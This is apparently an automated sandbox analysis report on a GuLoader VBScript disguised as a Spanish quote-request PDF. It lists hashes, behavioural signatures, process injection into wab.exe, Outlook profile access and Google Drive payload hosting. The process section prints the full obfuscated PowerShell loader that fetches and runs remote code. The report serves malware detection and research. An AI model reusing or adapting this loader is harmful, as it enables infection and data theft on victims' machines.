Analysis
-
max time kernel
141s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
25/03/2024, 16:26
Static task
static1
Behavioral task
behavioral1
Sample
Solicitud de presupuesto Urgente 554PE·pdf.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Solicitud de presupuesto Urgente 554PE·pdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
Solicitud de presupuesto Urgente 554PE·pdf.vbs
-
Size
179KB
-
MD5
c310f16989ab3da1c9701c1cf8d31ecd
-
SHA1
b2aca8e415cfca454a889b1ad089f67c679b3df8
-
SHA256
959ec9d9287432e3234cf35de1ad899ad4ae44d06e2bbf4fd0fe806b58ee6e21
-
SHA512
a409e379997ab922669672f959065db1ea82363a370274c2156dcbb4bca59b0fcca7ad3a7b6dea7ece3e2d0590256dac00c525f467ac00a6fe1bbc1e8302990f
-
SSDEEP
3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyZ:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcV2
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1764 WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 12 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3056 wab.exe 3056 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2752 powershell.exe 3056 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2752 set thread context of 3056 2752 powershell.exe 34 -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2308 powershell.exe 2752 powershell.exe 2752 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 3056 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1764 wrote to memory of 2308 1764 WScript.exe 28 PID 1764 wrote to memory of 2308 1764 WScript.exe 28 PID 1764 wrote to memory of 2308 1764 WScript.exe 28 PID 2308 wrote to memory of 1464 2308 powershell.exe 30 PID 2308 wrote to memory of 1464 2308 powershell.exe 30 PID 2308 wrote to memory of 1464 2308 powershell.exe 30 PID 2308 wrote to memory of 2752 2308 powershell.exe 32 PID 2308 wrote to memory of 2752 2308 powershell.exe 32 PID 2308 wrote to memory of 2752 2308 powershell.exe 32 PID 2308 wrote to memory of 2752 2308 powershell.exe 32 PID 2752 wrote to memory of 1936 2752 powershell.exe 33 PID 2752 wrote to memory of 1936 2752 powershell.exe 33 PID 2752 wrote to memory of 1936 2752 powershell.exe 33 PID 2752 wrote to memory of 1936 2752 powershell.exe 33 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 PID 2752 wrote to memory of 3056 2752 powershell.exe 34 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:1464
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS ,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:1936
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3056
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50e42bc5bdbf9ab895bb027528edc4139
SHA1f59fcec40aaff2f623d5588c1d448982556cc0ee
SHA25681c5a394565213f61de809e0dd1fd0972bfe0c36dc4c446ea986726bbf8e1fb1
SHA51271876b71b0bdfba832046c8f1f1ba43f3a35f951096d5d3e972f86e3696801ee3e23c1c86905f63aaedfc6309efd6c09693e0e65cfaae0102ad5439efacf980a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD517377c3f45ec353713f1d897171100af
SHA1f30b5fd3577754f5ce25d28982fee6283fb9e0c1
SHA256588353a715417a08f3eab42ee1a94afdeda0173661584c726e0347aaf82c5a73
SHA5126ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
6KB
MD5cf56f5795de669e0ee0796627c7142f2
SHA189a71383fe582e3ec82a024fd424cef08943daf9
SHA256858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf
SHA512c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\13W2C00ZFSWHOREFU16J.temp
Filesize7KB
MD5b9db5309c55375cba4808735274121b5
SHA14086e67f71b96aa911e1271e985ec19984843e25
SHA256135d3db0c26fdaab48ef70fd73fe5728508d705267ee1b92305641a7dfb5c986
SHA512a4551402534ed0dfdbe018a5d3a8cc16732243147e408205ede6c3452480f006ed0407517a0cb666a6d673cccbd91fe7b30bc5b5ddb548941c9dcfc26aae655e